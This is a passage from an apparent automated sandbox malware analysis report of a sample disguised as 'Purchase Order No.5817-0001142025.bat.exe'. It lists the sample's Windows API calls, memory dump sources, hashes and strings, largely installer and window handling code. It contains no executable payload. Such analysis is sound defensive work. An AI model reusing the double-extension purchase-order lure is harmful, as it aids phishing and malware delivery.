                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                      • String ID: $M$N
                                                                      • API String ID: 2564846305-813528018
                                                                      • Opcode ID: 324c1f4819b082b1ac23898fd696f3744d7b458a05ce4ad4b76fe224fda76cd4
                                                                      • Instruction ID: 3eec0fee992af157883e3c32035e614d90e83c27d9cb298499668aae57dc4bf7
                                                                      • Opcode Fuzzy Hash: 324c1f4819b082b1ac23898fd696f3744d7b458a05ce4ad4b76fe224fda76cd4
                                                                      • Instruction Fuzzy Hash: B4029D70A00608EFDB20DF64CD45AAF7BB5FB44314F10857AE910BA2E0D7B98A42DF18
                                                                      APIs
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040413E
                                                                      • ShowWindow.USER32(?), ref: 0040415E
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404170
                                                                      • ShowWindow.USER32(?,00000004), ref: 00404189
                                                                      • DestroyWindow.USER32 ref: 0040419D
                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 004041B6
                                                                      • GetDlgItem.USER32(?,?), ref: 004041D5
                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041E9
                                                                      • IsWindowEnabled.USER32(00000000), ref: 004041F0
                                                                      • GetDlgItem.USER32(?,00000001), ref: 0040429B
                                                                      • GetDlgItem.USER32(?,00000002), ref: 004042A5
                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 004042BF
                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404310
                                                                      • GetDlgItem.USER32(?,00000003), ref: 004043B6
                                                                      • ShowWindow.USER32(00000000,?), ref: 004043D7
                                                                      • EnableWindow.USER32(?,?), ref: 004043E9
                                                                      • EnableWindow.USER32(?,?), ref: 00404404
                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040441A
                                                                      • EnableMenuItem.USER32(00000000), ref: 00404421
                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404439
                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040444C
                                                                      • lstrlenW.KERNEL32(00422F48,?,00422F48,00000000), ref: 00404476
                                                                      • SetWindowTextW.USER32(?,00422F48), ref: 0040448A
                                                                      • ShowWindow.USER32(?,0000000A), ref: 004045BE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                                      • String ID: H/B
                                                                      • API String ID: 1860320154-184950203
                                                                      • Opcode ID: 6713c34f0db6ca24ad0fd02f4a6c26255f157c0ea2add66a7142b4456e47287b
                                                                      • Instruction ID: f8b0abefa6079376cca3afd4ac47b8e6787ccd0873a3a79b8952b84eeba681b3
                                                                      • Opcode Fuzzy Hash: 6713c34f0db6ca24ad0fd02f4a6c26255f157c0ea2add66a7142b4456e47287b
                                                                      • Instruction Fuzzy Hash: 91C1CFB1600204BBDB316F61EE85A2B7AB8EB85345F41053EF741B25F0CB795842DB2D
                                                                      APIs
                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040485E
                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404872
                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040488F
                                                                      • GetSysColor.USER32(?), ref: 004048A0
                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004048AE
                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004048BC
                                                                      • lstrlenW.KERNEL32(?), ref: 004048C1
                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004048CE
                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048E3
                                                                      • GetDlgItem.USER32(?,0000040A), ref: 0040493C
                                                                      • SendMessageW.USER32(00000000), ref: 00404943
                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040496E
                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004049B1
                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004049BF
                                                                      • SetCursor.USER32(00000000), ref: 004049C2
                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004049DB
                                                                      • SetCursor.USER32(00000000), ref: 004049DE
                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404A0D
                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404A1F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                      • String ID: 7G@$Call$N
                                                                      • API String ID: 3103080414-3155595626
                                                                      • Opcode ID: b6dc2905c6216746abb3c0cd17d9c39e8b2e61a9098f8b336cb1d1698ee7a258
                                                                      • Instruction ID: cd0ff63a31a53d86839c1a5ce07a34679cc09665db384d3569e6db54912acae5
                                                                      • Opcode Fuzzy Hash: b6dc2905c6216746abb3c0cd17d9c39e8b2e61a9098f8b336cb1d1698ee7a258
                                                                      • Instruction Fuzzy Hash: 9061B0B1A40209BFDB10AF64CD85EAA7B69FB84305F00843AF605B72D0D779AD51CF98
                                                                      APIs
                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406463,?,?), ref: 00406303
                                                                      • GetShortPathNameW.KERNEL32(?,004265E8,00000400), ref: 0040630C
                                                                        • Part of subcall function 004060D7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E7
                                                                        • Part of subcall function 004060D7: lstrlenA.KERNEL32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406119
                                                                      • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 00406329
                                                                      • wsprintfA.USER32 ref: 00406347
                                                                      • GetFileSize.KERNEL32(00000000,00000000,00426DE8,C0000000,00000004,00426DE8,?,?,?,?,?), ref: 00406382
                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406391
                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063C9
                                                                      • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004261E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040641F
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00406430
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406437
                                                                        • Part of subcall function 00406172: GetFileAttributesW.KERNELBASE(00000003,00403118,C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe,80000000,00000003), ref: 00406176
                                                                        • Part of subcall function 00406172: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406198
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                      • String ID: %ls=%ls$[Rename]$eB$mB$mB
                                                                      • API String ID: 2171350718-2529913679
                                                                      • Opcode ID: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
                                                                      • Instruction ID: 393dc7f902851ea198dcc63c4c4a9d42cf85fc1b4335f85fcc59b0ede2066cac
                                                                      • Opcode Fuzzy Hash: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
                                                                      • Instruction Fuzzy Hash: 35313571600325BBD2206B29AD49F6B3A6CDF41744F17003AF902F62D3DA7CD82686BC
                                                                      APIs
                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                      • DrawTextW.USER32(00000000,00428A60,000000FF,00000010,00000820), ref: 00401156
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                      • String ID: F
                                                                      • API String ID: 941294808-1304234792
                                                                      • Opcode ID: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
                                                                      • Instruction ID: 3c33d73dbc2ffdf14e434cca4ae815e9cfbd561affca8d3971a90777bf4c3be5
                                                                      • Opcode Fuzzy Hash: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
                                                                      • Instruction Fuzzy Hash: 34418B71800249AFCF058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB34DA55DFA4
                                                                      APIs
                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00406993
                                                                      • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069A2
                                                                      • CharNextW.USER32(?,"C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069A7
                                                                      • CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069BA
                                                                      Strings
                                                                      • "C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe", xrefs: 00406974
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00406931
                                                                      • *?|<>/":, xrefs: 00406982
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Next$Prev
                                                                      • String ID: "C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 589700163-488343736
                                                                      • Opcode ID: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                                      • Instruction ID: f71de53da442769783aaa0cb2fea73a85be5ebad64e4744dd58b15c84f46a956
                                                                      • Opcode Fuzzy Hash: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                                      • Instruction Fuzzy Hash: 2211C8A580021295DB303B548D40B7766F8AF59790F56403FED96B3AC1E77C4C9282BD
                                                                      APIs
                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00404685
                                                                      • GetSysColor.USER32(00000000), ref: 004046C3
                                                                      • SetTextColor.GDI32(?,00000000), ref: 004046CF
                                                                      • SetBkMode.GDI32(?,?), ref: 004046DB
                                                                      • GetSysColor.USER32(?), ref: 004046EE
                                                                      • SetBkColor.GDI32(?,?), ref: 004046FE
                                                                      • DeleteObject.GDI32(?), ref: 00404718
                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404722
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                      • String ID:
                                                                      • API String ID: 2320649405-0
                                                                      • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                      • Instruction ID: a82f55cf926b6e885627a74f3bab1bdd796941bf972b84b6a5e459a8b365bc4c
                                                                      • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                      • Instruction Fuzzy Hash: 5C2177715007449BC7309F78DD48B577BF4AF42715B04893DEA96A36E0D738E944CB58
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                                      • lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                                      • lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
                                                                      • SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                      • String ID:
                                                                      • API String ID: 2531174081-0
                                                                      • Opcode ID: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                                      • Instruction ID: 0122bdc4cc194b68d617bf21deccaf32741d68d09ea49b6ef8aede989cb0ca1f
                                                                      • Opcode Fuzzy Hash: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                                      • Instruction Fuzzy Hash: F9219D71900618FACF119FA5DD84ACFBFB9EF45364F10843AF904B62A0C7794A419FA8
                                                                      APIs
                                                                      • DestroyWindow.USER32(00000000,00000000), ref: 0040304E
                                                                      • GetTickCount.KERNEL32 ref: 0040306C
                                                                      • wsprintfW.USER32 ref: 0040309A
                                                                        • Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                                        • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                                        • Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
                                                                        • Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 004030BE
                                                                      • ShowWindow.USER32(00000000,00000005), ref: 004030CC
                                                                        • Part of subcall function 00403017: MulDiv.KERNEL32(00000000,00000064,00002F88), ref: 0040302C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                      • String ID: ... %d%%
                                                                      • API String ID: 722711167-2449383134
                                                                      • Opcode ID: 08ac34a4e5fc7f4836fd10a2a84a83e51d98fc20e7055cc4174bcdc419dd85dd
                                                                      • Instruction ID: 5115fc65002d889466af77c95cd87ea57bd417394e766d10746fa218fe5c3c06
                                                                      • Opcode Fuzzy Hash: 08ac34a4e5fc7f4836fd10a2a84a83e51d98fc20e7055cc4174bcdc419dd85dd
                                                                      • Instruction Fuzzy Hash: CA01C830642610E7CB31AF50AE09A6B3FACAB04706F64043BF441B11D9D6B85A51CF9D
                                                                      APIs
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FD7
                                                                      • GetMessagePos.USER32 ref: 00404FDF
                                                                      • ScreenToClient.USER32(?,?), ref: 00404FF9
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040500B
                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405031
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Send$ClientScreen
                                                                      • String ID: f
                                                                      • API String ID: 41195575-1993550816
                                                                      • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                      • Instruction ID: f32abc49a7be06d84d864a503b70a66925f192d82b82ee1d40ead4c3c6165fb8
                                                                      • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
